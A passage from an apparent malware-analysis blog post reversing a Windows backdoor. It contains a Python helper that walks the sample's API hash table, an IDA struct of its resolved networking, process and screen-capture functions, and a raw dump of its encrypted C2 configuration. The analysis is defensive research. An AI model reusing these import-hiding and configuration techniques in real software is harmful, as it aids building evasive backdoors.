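    0x3E78F34A, 0x87B7BC52, 0xA84D25A0, 0xB81E8F04, 0x728DA026,
    0x01, 0xDF91E0A8,
    0x03, 0xABBC681B, 0x8EBEF5B1, 0x7CBD2247,
    0x07, 0x8AD7DE22, 0x453DB143, 0x72760BB8, 0xB9D41C39, 0x28E9E291, 0x87FEDB50, 0x5CB5EF72,
    0x13,
    0xCDDE757D, 0x0E5971F6, 0x0E797764, 0x4C7C5841, 0x939D7D9C, 0xFC7AF16A, 0x8E9BF775,
    0xEDD8FE8A, 0x8E878072, 0xD8923733, 0x0C5A7764, 0x9E7D3188, 0x3C797B7A, 0xD939F838,
    0x95E4A5D7, 0x9400A044, 0xF44318C6, 0xB909D088, 0x5D99726A,
    0x06, 0x9E90B462, 0x4894DAFC, 0xDF91A857, 0x48B87EFC, 0x6B3470D5, 0x5AF0017C,
    0x00,  # assumed terminator: the loop stops when it reads a count of 0
]

# pdll steps through the HMODULE fields in the order sub_405060 loaded them.
DLL_ORDER = ["kernel32", "ntdll", "shell32", "user32", "advapi32", "ws2_32", "gdi32"]

FUNCTIONS_SIZE = 392    # functions.size in the init routine
# version, size, seven HMODULEs, malloc, free, mtrand, EncodeAndSend precede
# LoadLibraryA, the first slot the loop fills (paddr = &functions.LoadLibraryA).
HEADER_DWORDS = 13
FIRST_SLOT_OFFSET = HEADER_DWORDS * 4   # 0x34


def walk_hash_table(table: List[int], dlls: List[str]) -> Dict[str, List[int]]:
    """Mirror of the while/for loop in sub_405060: read a count, take that many
    hashes for the current DLL, move to the next DLL, stop on a zero count."""
    groups: Dict[str, List[int]] = {}
    pos = 0
    num = table[pos]
    pos += 1
    dll_idx = 0
    while num:
        if dll_idx >= len(dlls):
            raise ValueError("more hash groups than loaded DLLs")
        groups[dlls[dll_idx]] = table[pos:pos + num]
        pos += num
        dll_idx += 1
        num = table[pos] if pos < len(table) else 0   # missing terminator == end
        pos += 1
    return groups


def slot_layout(groups: Dict[str, List[int]]) -> List[Tuple[str, int, int]]:
    """(dll, name hash, byte offset in FUNCTIONS) for every resolved pointer,
    handy when annotating the structure in IDA's Local Types."""
    layout: List[Tuple[str, int, int]] = []
    offset = FIRST_SLOT_OFFSET
    for dll in DLL_ORDER:
        for h in groups.get(dll, []):
            layout.append((dll, h, offset))
            offset += 4
    return layout


def expected_slots(struct_size: int = FUNCTIONS_SIZE) -> int:
    """Function pointers the structure has room for after the header fields."""
    return struct_size // 4 - HEADER_DWORDS


if __name__ == "__main__":
    groups = walk_hash_table(HASH_TABLE, DLL_ORDER)
    for dll, hashes in groups.items():
        print(f"{dll:9s} {len(hashes):2d} hashes")
    used = sum(len(v) for v in groups.values())
    print(f"slots used: {used} of {expected_slots()} (struct size {FUNCTIONS_SIZE})")
    for dll, h, off in slot_layout(groups)[:3]:
        print(f"  {dll} {h:#010x} at FUNCTIONS+{off:#x}")
```

<p>The counts per DLL (37, 12, 1, 3, 7, 19, 6) add up to 85 pointers, which is exactly the room left in a 392-byte structure after the 13 header DWORDs, a useful cross-check that the table and the structure definition agree before spending time on the hash algorithm.</p>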
<p>Debugging reveals that these function addresses are stored in a structure; we can define it in IDA Pro's Local Types (shortcut <code class="highlighter-rouge">Alt+5</code>) to help with the rest of the analysis:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="kr">__declspec</span><span class="p">(</span><span class="n">align</span><span class="p">(</span><span class="mi">4</span><span class="p">))</span> <span class="n">FUNCTIONS</span>
<span class="p">{</span>
<span class="n">DWORD</span> <span class="n">version</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">size</span><span class="p">;</span>
<span class="n">HMODULE</span> <span class="n">hkernel32</span><span class="p">;</span>
<span class="n">HMODULE</span> <span class="n">hntdll</span><span class="p">;</span>
<span class="n">HMODULE</span> <span class="n">hshell32</span><span class="p">;</span>
<span class="n">HMODULE</span> <span class="n">huser32</span><span class="p">;</span>
<span class="n">HMODULE</span> <span class="n">hadvapi32</span><span class="p">;</span>
<span class="n">HMODULE</span> <span class="n">hws2_32</span><span class="p">;</span>
<span class="n">HMODULE</span> <span class="n">hgdi32</span><span class="p">;</span>
<span class="kt">void</span> <span class="o">*</span><span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">malloc</span><span class="p">)(</span><span class="kt">int</span><span class="p">);</span>
<span class="kt">void</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">free</span><span class="p">)(</span><span class="kt">void</span> <span class="o">*</span><span class="p">);</span>
<span class="n">DWORD</span> <span class="n">mtrand</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">EncodeAndSend</span><span class="p">)(</span><span class="n">Client</span> <span class="o">*</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="p">,</span> <span class="kt">int</span><span class="p">);</span>
<span class="n">HMODULE</span> <span class="p">(</span><span class="kr">__stdcall</span> <span class="o">*</span><span class="n">LoadLibraryA</span><span class="p">)(</span><span class="kt">char</span> <span class="o">*</span><span class="p">);</span>
<span class="n">DWORD</span> <span class="p">(</span><span class="kr">__stdcall</span> <span class="o">*</span><span class="n">GetProcAddress</span><span class="p">)(</span><span class="n">HMODULE</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="p">);</span>
<span class="n">DWORD</span> <span class="n">CreateFileA</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">CreateFileW</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">GetFileSizeEx</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">CloseHandle</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">GetVolumeInformationW</span><span class="p">;</span>
<span class="kt">void</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">Sleep</span><span class="p">)(</span><span class="kt">int</span><span class="p">);</span>
<span class="n">DWORD</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">ExitProcess</span><span class="p">)(</span><span class="n">DWORD</span><span class="p">);</span>
<span class="n">DWORD</span> <span class="n">OutputDebugStringA</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">OutputDebugStringW</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">GetDiskFreeSpaceExW</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">GetDriveTypeW</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">GetLogicalDrives</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">ReadFile</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">WriteFile</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">WaitForSingleObject</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">CreateThread</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">VirtualQuery</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">CreateEventW</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">TerminateProcess</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">GetTickCount</span><span class="p">;</span>
<span class="n">LCID</span> <span class="p">(</span><span class="kr">__stdcall</span> <span class="o">*</span><span class="n">GetUserDefaultLCID</span><span class="p">)();</span>
<span class="n">BOOL</span> <span class="p">(</span><span class="kr">__stdcall</span> <span class="o">*</span><span class="n">GetComputerNameW</span><span class="p">)(</span><span class="kt">wchar_t</span> <span class="o">*</span><span class="p">,</span> <span class="n">DWORD</span> <span class="o">*</span><span class="p">);</span>
<span class="n">LPVOID</span> <span class="p">(</span><span class="kr">__stdcall</span> <span class="o">*</span><span class="n">VirtualAlloc</span><span class="p">)(</span><span class="n">LPVOID</span> <span class="n">lpAddress</span><span class="p">,</span> <span class="n">DWORD</span> <span class="n">dwSize</span><span class="p">,</span> <span class="n">MACRO_MEM</span> <span class="n">flAllocationType</span><span class="p">,</span> <span class="n">MACRO_PAGE</span><span class="p">);</span>
<span class="n">BOOL</span> <span class="p">(</span><span class="kr">__stdcall</span> <span class="o">*</span><span class="n">VirtualFree</span><span class="p">)(</span><span class="n">LPVOID</span><span class="p">,</span> <span class="n">DWORD</span><span class="p">,</span> <span class="n">MACRO_MEM</span><span class="p">);</span>
<span class="n">HANDLE</span> <span class="p">(</span><span class="kr">__stdcall</span> <span class="o">*</span><span class="n">CreateMutexW</span><span class="p">)(</span><span class="n">LPSECURITY_ATTRIBUTES</span><span class="p">,</span> <span class="n">BOOL</span><span class="p">,</span> <span class="n">LPCTSTR</span><span class="p">);</span>
<span class="n">BOOL</span> <span class="p">(</span><span class="kr">__stdcall</span> <span class="o">*</span><span class="n">GetVersionExW</span><span class="p">)(</span><span class="n">LPOSVERSIONINFO</span><span class="p">);</span>
<span class="n">DWORD</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">_GetLastError</span><span class="p">)();</span>
<span class="n">DWORD</span> <span class="n">GetEnvironmentVariableW</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">CreatePipe</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">SetHandleInformation</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">CreateProcessW</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">PeekNamedPipe</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">FindFirstFileW</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">FindNextFileW</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">FindClose</span><span class="p">;</span>
<span class="kt">void</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">memcpy</span><span class="p">)(</span><span class="kt">int</span><span class="p">,</span> <span class="kt">int</span><span class="p">,</span> <span class="kt">int</span><span class="p">);</span>
<span class="kt">void</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">memset</span><span class="p">)(</span><span class="kt">int</span><span class="p">,</span> <span class="kt">int</span><span class="p">,</span> <span class="kt">int</span><span class="p">);</span>
<span class="kt">int</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">memcmp</span><span class="p">)(</span><span class="kt">int</span><span class="p">,</span> <span class="kt">int</span><span class="p">,</span> <span class="kt">int</span><span class="p">);</span>
<span class="kt">int</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">strcmp</span><span class="p">)(</span><span class="kt">int</span><span class="p">,</span> <span class="kt">int</span><span class="p">,</span> <span class="kt">int</span><span class="p">);</span>
<span class="kt">char</span> <span class="o">*</span><span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">strncpy</span><span class="p">)(</span><span class="kt">char</span> <span class="o">*</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="p">,</span> <span class="kt">size_t</span><span class="p">);</span>
<span class="kt">wchar_t</span> <span class="o">*</span><span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">wcsncpy</span><span class="p">)(</span><span class="kt">wchar_t</span> <span class="o">*</span><span class="p">,</span> <span class="k">const</span> <span class="kt">wchar_t</span> <span class="o">*</span><span class="p">,</span> <span class="kt">size_t</span><span class="p">);</span>
<span class="kt">int</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">wcscmp</span><span class="p">)(</span><span class="kt">wchar_t</span> <span class="o">*</span><span class="p">,</span> <span class="kt">wchar_t</span> <span class="o">*</span><span class="p">);</span>
<span class="n">DWORD</span> <span class="n">wcscat</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">InitializeCriticalSection</span><span class="p">)(</span><span class="kt">void</span> <span class="o">*</span><span class="p">);</span>
<span class="n">DWORD</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">DeleteCriticalSection</span><span class="p">)(</span><span class="kt">void</span> <span class="o">*</span><span class="p">);</span>
<span class="kt">void</span> <span class="p">(</span><span class="kr">__stdcall</span> <span class="o">*</span><span class="n">EnterCriticalSection</span><span class="p">)(</span><span class="n">CRITICAL_SECTION</span> <span class="o">*</span><span class="p">);</span>
<span class="kt">void</span> <span class="p">(</span><span class="kr">__stdcall</span> <span class="o">*</span><span class="n">LeaveCriticalSection</span><span class="p">)(</span><span class="n">CRITICAL_SECTION</span> <span class="o">*</span><span class="p">);</span>
<span class="n">DWORD</span> <span class="n">CommandLineToArgvW</span><span class="p">;</span>
<span class="kt">int</span> <span class="p">(</span><span class="kr">__stdcall</span> <span class="o">*</span><span class="n">MessageBoxW</span><span class="p">)(</span><span class="n">HWND</span><span class="p">,</span> <span class="kt">wchar_t</span> <span class="o">*</span><span class="p">,</span> <span class="kt">wchar_t</span> <span class="o">*</span><span class="p">,</span> <span class="n">DWORD</span><span class="p">);</span>
<span class="n">DWORD</span> <span class="n">GetSystemMetrics</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">NtUserGetDC</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">CryptAcquireContextW</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">CryptGenRandom</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">CryptReleaseContext</span><span class="p">;</span>
<span class="n">BOOL</span> <span class="p">(</span><span class="kr">__stdcall</span> <span class="o">*</span><span class="n">GetUserNameW</span><span class="p">)(</span><span class="kt">wchar_t</span> <span class="o">*</span><span class="p">,</span> <span class="n">DWORD</span> <span class="o">*</span><span class="p">);</span>
<span class="n">BOOL</span> <span class="p">(</span><span class="kr">__stdcall</span> <span class="o">*</span><span class="n">AllocateAndInitializeSid</span><span class="p">)(</span><span class="n">PSID_IDENTIFIER_AUTHORITY</span><span class="p">,</span> <span class="n">BYTE</span><span class="p">,</span> <span class="n">DWORD</span><span class="p">,</span> <span class="n">DWORD</span><span class="p">,</span> <span class="n">DWORD</span><span class="p">,</span> <span class="n">DWORD</span><span class="p">,</span> <span class="n">DWORD</span><span class="p">,</span> <span class="n">DWORD</span><span class="p">,</span> <span class="n">DWORD</span><span class="p">,</span> <span class="n">DWORD</span><span class="p">,</span> <span class="n">PSID</span><span class="p">);</span>
<span class="n">BOOL</span> <span class="p">(</span><span class="kr">__stdcall</span> <span class="o">*</span><span class="n">CheckTokenMembership</span><span class="p">)(</span><span class="n">HANDLE</span><span class="p">,</span> <span class="n">PSID</span><span class="p">,</span> <span class="n">BOOL</span> <span class="o">*</span><span class="p">);</span>
<span class="n">PVOID</span> <span class="p">(</span><span class="kr">__stdcall</span> <span class="o">*</span><span class="n">FreeSid</span><span class="p">)(</span><span class="n">PSID</span><span class="p">);</span>
<span class="kt">int</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">WSAStartup</span><span class="p">)(</span><span class="n">WORD</span><span class="p">,</span> <span class="n">LPWSADATA</span><span class="p">);</span>
<span class="kt">int</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">recv</span><span class="p">)(</span><span class="kt">int</span><span class="p">,</span> <span class="kt">int</span><span class="p">,</span> <span class="kt">int</span><span class="p">,</span> <span class="kt">int</span><span class="p">);</span>
<span class="kt">int</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">send</span><span class="p">)(</span><span class="kt">int</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="p">,</span> <span class="kt">int</span><span class="p">,</span> <span class="kt">int</span><span class="p">);</span>
<span class="kt">int</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">shutdown</span><span class="p">)(</span><span class="n">SOCKET</span><span class="p">,</span> <span class="n">MACRO_SD</span><span class="p">);</span>
<span class="kt">int</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">closesocket</span><span class="p">)(</span><span class="kt">int</span><span class="p">);</span>
<span class="n">SOCKET</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">socket</span><span class="p">)(</span><span class="n">MACRO_AF</span><span class="p">,</span> <span class="n">MACRO_SOCK</span><span class="p">,</span> <span class="kt">int</span><span class="p">);</span>
<span class="n">WORD</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">ntohs</span><span class="p">)(</span><span class="n">WORD</span> <span class="n">port</span><span class="p">);</span>
<span class="kt">int</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">connect</span><span class="p">)(</span><span class="kt">int</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sockaddr_in</span> <span class="o">*</span><span class="p">,</span> <span class="kt">int</span><span class="p">);</span>
<span class="n">DWORD</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">GetLastError</span><span class="p">)();</span>
<span class="kt">int</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">setsockopt</span><span class="p">)(</span><span class="kt">int</span><span class="p">,</span> <span class="kt">int</span><span class="p">,</span> <span class="kt">int</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="p">,</span> <span class="kt">int</span><span class="p">);</span>
<span class="kt">int</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">bind</span><span class="p">)(</span><span class="kt">int</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sockaddr</span> <span class="o">*</span><span class="p">,</span> <span class="kt">int</span><span class="p">);</span>
<span class="kt">int</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">listen</span><span class="p">)(</span><span class="kt">int</span><span class="p">,</span> <span class="kt">int</span><span class="p">);</span>
<span class="kt">int</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">accept</span><span class="p">)(</span><span class="kt">int</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sockaddr</span> <span class="o">*</span><span class="p">,</span> <span class="kt">int</span> <span class="o">*</span><span class="p">);</span>
<span class="n">DWORD</span> <span class="n">getpeername</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">inet_addr</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">inet_ntoa</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">gethostbyname</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">gethostname</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">select</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">BitBlt</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">SelectObject</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">GetDIBits</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">DeleteObject</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">CreateCompatibleBitmap</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">CreateCompatibleDC</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>
<h3 id="解密設定檔-malware-config">Decrypting the configuration (Malware config)</h3>
<p>A backdoor usually carries a configuration block that stores what it needs to reach its C2 server: the C2 domain, port, password, group and so on. Malware researchers also use these configuration fields to track a sample back to its family. The function that decrypts the configuration is <code class="highlighter-rouge">sub_404FF0</code>, and the encrypted config sits at <code class="highlighter-rouge">0x415278</code>.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0FEh, 9Fh, 0D8h, 31h, 1, 0C8h, 1Ah, 31h, 0E2h, 47h, 3Dh, 0D8h, 5Eh, 7Ah, 40h, 3Bh, 0E5h, 6Ah, 0E1h, 7Fh, 0AAh, 42h, 0DAh, 58h, 0A7h, 0BAh, 26h, 0B9h, 2 dup(26h), 58h, 89h, 88h, 15h, 8Ah, 3Bh, 4Ch, 0B5h, 7Eh, 0E8h, 0DCh, 0D7h, 13h, 0CAh, 92h, 0E7h, 92h, 7Fh, 18h, 9Ch, 0D6h, 0C8h, 44h, 4Ch, 70h, 3Fh, 50h, 12h, 9Bh, 82h, 76h, 16h, 73h, 93h, 0BCh, 0Eh, 61h, 7Fh, 12h, 5, 0DAh, 3Eh, 9Ah, 5Bh, 49h, 0DBh, 47h, 0Eh, 49h, 0D5h, 0A9h, 37h, 18h, 0C4h, 7, 0D8h, 48h, 3Fh, 0AFh, 0D4h, 0B8h, 0FEh, 8Ah, 3Fh, 0C3h, 3Ch, 0F3h, 0D8h, 0B7h, 5Fh, 0C9h, 0D4h, 89h, 0DBh, 0C3h, 0DEh, 0C7h, 54h, 4, 5Bh, 0CDh, 3, 0F0h, 0F2h, 3Ch, 5Ah, 3Dh, 4Ch, 0A8h, 0EBh, 4Dh, 18h, 91h, 86h, 0BBh, 53h, 95h, 0A1h, 34h, 0C6h, 0E3h, 0FDh, 88h, 0D0h, 0F3h, 87h, 0, 65h, 75h, 7Dh, 0F3h, 57h, 87h, 0D1h, 94h, 0D4h, 2Ah, 0D2h, 0Eh, 31h, 0F7h, 9, 0D3h, 0E5h, 0Eh, 61h, 30h, 0D9h, 50h, 8Ch, 26h, 0DFh, 0CEh, 0A1h, 75h, 7Fh, 80h, 0Ah, 0F9h, 0FAh, 3Bh, 9Dh, 39h, 89h, 0DDh, 9, 3Eh, 0E6h, 0CBh, 74h, 0A1h, 0Dh, 9Dh, 62h, 0E8h, 44h, 17h, 0D9h, 13h, 59h, 5Bh, 0C3h, 71h, 2Bh, 5Eh, 93h, 0B8h, 6Bh, 99h, 2Bh, 55h, 0A4h, 1, 0FDh, 1, 79h, 38h, 71h, 95h, 2Fh, 5, 87h, 1Fh, 6Bh, 2, 0BEh, 35h, 3Ch, 94h, 34h, 89h, 5Bh, 20h, 0Eh, 0BEh, 0B2h, 7Ch, 1Ah, 7Ah, 1Ch, 0A4h, 0B3h, 0BDh, 6Ch, 0AFh, 0E6h, 71h, 0B0h, 1, 0D3h, 42h, 0B7h, 0C1h, 55h, 0AFh, 0D0h, 8Eh, 0E5h, 61h, 0D5h, 6Dh, 0BBh, 0BCh, 68h, 6, 37h, 0B5h, 7Dh, 11h, 80h, 0E3h, 19h, 0Bh, 6Bh, 0D8h, 58h, 2Dh, 9Eh, 0B1h, 0B5h, 9Eh, 0F5h, 9Bh, 86h, 8Dh, 24h, 16h, 0C6h, 0CAh, 9Eh, 7Ah, 17h, 0E6h, 0B6h, 0B1h, 7, 5, 4, 9Ch, 93h, 70h, 0Bh, 69h, 0EAh, 5, 18h, 6Eh, 73h, 52h, 6Dh, 0EAh, 10h, 79h, 9Fh, 3Ch, 0A5h, 60h, 3Dh, 0A8h, 0D4h, 0BBh, 0B2h, 0F9h, 0Bh, 0D4h, 6Dh, 0F8h, 0C1h, 0D5h, 2 dup(3Fh), 0FCh, 3Ch, 4, 48h, 17h, 89h, 85h, 0C9h, 0C2h, 39h, 9Dh, 44h, 4Ah, 0F8h, 9Bh, 0D9h, 1Bh, 13h, 0E8h, 60h, 83h, 2Ch, 0EAh, 0B4h, 0B8h, 31h, 27h, 51h, 1Dh, 8Fh, 0AEh, 22h, 0C1h, 0A2h, 0B3h, 94h, 28h, 70h, 79h, 0EFh, 4Fh, 98h, 75h, 
0E6h, 0EAh, 85h, 0B0h, 6Dh, 0F0h, 0E7h, 6Dh, 0CAh, 59h, 64h, 0Ch, 0EFh, 27h, 8Ah, 2Eh, 7, 0A3h, 9, 1Ah, 4Fh, 0E9h, 1Fh, 5Fh, 27h, 0A6h, 53h, 0BBh, 69h, 21h, 66h, 3Ch, 0F9h, 78h, 87h, 0A5h, 9Dh, 2Ch, 0C6h, 13h, 0Fh, 0E0h, 0CBh, 0E0h, 51h, 5Eh, 2 dup(0C8h), 41h, 0DBh, 0ACh, 4Ah, 6Dh, 7Ch, 9Ah, 51h, 28h, 19h, 99h, 14h, 0DEh, 40h, 8Dh, 3Bh, 0A4h, 7Dh, 66h, 43h, 13h, 0D8h, 97h, 23h, 57h, 0A0h, 0C9h, 30h, 83h, 67h, 0D1h, 3Eh, 27h, 4Eh, 0E0h, 8, 25h, 83h, 0FAh, 0D2h, 0C0h, 7, 0AAh, 4Ch, 0F6h, 0B5h, 0F3h, 0BAh, 10h, 80h, 89h, 52h, 77h, 0FCh, 42h, 0E5h, 0C9h, 20h, 0C7h, 0C2h, 2Ch, 4Ah, 8Fh, 0D8h, 0E3h, 83h, 0Eh, 1Ah, 1Fh, 4, 29h, 28h, 17h, 0FAh, 0EEh, 2Bh, 5Ah, 87h, 82h, 0, 64h, 9, 5Ah, 9Ah, 70h, 9Eh, 0AEh, 0A1h, 8Eh, 0E8h, 2Bh, 5Fh, 0F5h, 0Dh, 0E9h, 0DDh, 9Ah, 2, 9Ch, 49h, 2, 0Ah, 0Eh, 9Bh, 54h, 79h, 0CDh, 79h, 0B2h, 0BEh, 20h, 57h, 0C9h, 0A0h, 40h, 0E2h, 0C1h, 0C8h, 0A0h, 9Fh, 0B4h, 80h, 3Ah, 0CFh, 0B4h, 0BAh, 0F6h, 97h, 46h, 54h, 0C3h, 5Dh, 56h, 9Ah, 0F2h, 75h, 0CCh, 0Dh, 0C6h, 0FDh, 0A5h, 63h, 0B7h, 5, 67h, 0CEh, 0A3h, 0F4h, 0C4h, 81h, 6Eh, 26h, 0AFh, 71h, 0C9h, 0DAh, 86h, 58h, 10h, 4Ch, 9Fh, 0, 7Ch, 1Eh, 25h, 0BEh, 9Ah, 0FCh, 22h, 3Ch, 0FCh, 80h, 0DCh, 7Ch, 2Eh, 53h, 65h, 1Ah, 0EBh, 96h, 6Eh, 0D2h, 91h, 80h, 5Ch, 41h, 0D3h, 48h, 9Eh, 0F0h, 0AEh, 45h, 3Dh, 8Eh, 9Eh, 54h, 0B4h, 7Dh, 11h, 7Ah, 3, 91h, 1Ch, 0CAh, 0FFh, 14h, 6Dh, 89h, 0ECh, 0Dh, 81h, 91h, 4Dh, 0C1h, 17h, 0F3h, 0FBh, 7Bh, 0E4h, 0E0h, 75h, 89h, 88h, 0CAh, 77h, 87h, 0C1h, 0C6h, 0CEh, 0E0h, 0DEh, 35h, 6Ah, 91h, 77h, 0A3h, 0B5h, 30h, 5Ch, 0EFh, 23h, 2Dh, 0CBh, 0ACh, 0Ah, 59h, 0E6h, 0C8h, 0B5h, 0A4h, 63h, 6Bh, 0B4h, 2Bh, 86h, 22h, 75h, 72h, 4Ch, 3Dh, 19h, 0EDh, 0EAh, 76h, 80h, 0C6h, 75h, 0D3h, 0A6h, 0DAh, 0E3h, 0CDh, 33h, 5, 32h, 0B1h, 4Dh, 9Fh, 0E7h, 47h, 0B1h, 46h, 0BAh, 0B2h, 2, 0DEh, 90h, 97h, 60h, 0D7h, 0A9h, 81h, 3Dh, 0AEh, 1Bh, 84h, 6Ch, 0B7h, 7Fh, 21h, 7Bh, 19h, 0EAh, 6Ah, 43h, 1Ah, 1Fh, 66h, 0BDh, 9Dh, 2, 0B7h, 18h, 0E8h, 50h, 7Ah, 8, 0ABh, 8Eh, 6Fh, 60h, 3Eh, 3Fh, 5Ah, 0E3h, 2Bh, 5Ah, 0A9h, 57h, 0ECh, 
0FBh, 56h, 0DCh, 0F6h, 59h, 0Fh, 7Ch, 0F6h, 0F8h, 95h, 3, 5Ah, 20h, 62h, 11h, 13h, 8Dh, 8Eh, 6Dh, 99h, 68h, 0F3h, 9Ch, 30h, 76h, 90h, 0B3h, 6Bh, 90h, 2Bh, 69h, 0EEh, 53h, 3Ah, 70h, 77h, 18h, 4, 6, 20h, 26h, 4, 0A6h, 0DEh, 54h, 8Eh, 0A1h, 4Eh, 2 dup(0B5h), 0B3h, 0B1h, 73h, 6Bh, 5Ah, 34h, 0D7h, 0EAh, 27h, 76h, 0CFh, 53h, 0ADh, 44h, 80h, 95h, 87h, 0A7h, 65h, 91h, 8, 20h, 12h, 7Ch, 0B0h, 32h, 1, 84h, 5Bh, 21h, 9Ch, 0B6h, 0F7h, 0FAh, 50h, 1Fh, 6Ah, 0D3h, 67h, 31h, 6Fh, 54h, 7Dh, 69h, 0A0h, 76h, 33h, 2Fh, 0D3h, 8Bh, 27h, 0FEh, 0AAh, 7Fh, 23h, 0C4h, 66h, 5Dh, 94h, 8Ch, 0FCh, 14h, 3Eh, 5Ah, 6Bh, 7Ch, 2Fh, 56h, 4Ch, 94h, 0F1h, 2Dh, 0ABh, 0Eh, 4, 0B5h, 15h, 0Dh, 8Bh, 0D0h, 0F2h, 2Dh, 46h, 92h, 16h, 0C4h, 0C0h, 0A6h, 92h, 67h, 0CAh, 0EDh, 0D0h, 0B0h, 27h, 69h, 0DFh, 3Fh, 89h, 5Ah, 0Bh, 0FFh, 0BDh, 0A6h, 0B1h, 0AAh, 22h, 7Eh, 51h, 90h, 5Fh, 3Fh, 0E5h, 94h, 55h, 96h, 71h, 77h, 53h, 0E8h, 0DCh, 59h, 89h, 0F1h, 0FEh, 7Ch, 0C0h, 0ABh, 0FAh, 4Ch, 48h, 71h, 0CEh, 9Ch, 31h, 64h, 28h, 33h, 0BEh, 0Eh, 7Ch, 87h, 16h, 45h, 53h, 0C8h, 3Dh, 52h, 0E6h, 20h, 43h, 53h, 0EBh, 3Ah, 0BBh, 0DEh, 0AFh, 1, 6Fh, 0E7h, 65h, 0AAh, 52h, 0E4h, 0BDh, 0F4h, 0B6h, 2Eh, 0B9h, 0AEh, 0BFh, 0ABh, 0BDh, 7Ah, 18h, 0AAh, 0E5h, 0D2h, 0E4h, 0Eh, 9Ah, 48h, 0F8h, 0AFh, 68h, 12h, 47h, 0FDh, 0Ah, 0C5h, 9Dh, 0E7h, 0C7h, 61h, 91h, 0FBh, 2, 8Eh, 0B5h, 0CEh, 0Ch, 25h, 0Fh, 9Eh, 3Ch, 0F2h, 0CDh, 36h, 42h, 0B9h, 34h, 12h, 0B8h, 76h, 0DAh, 0C4h, 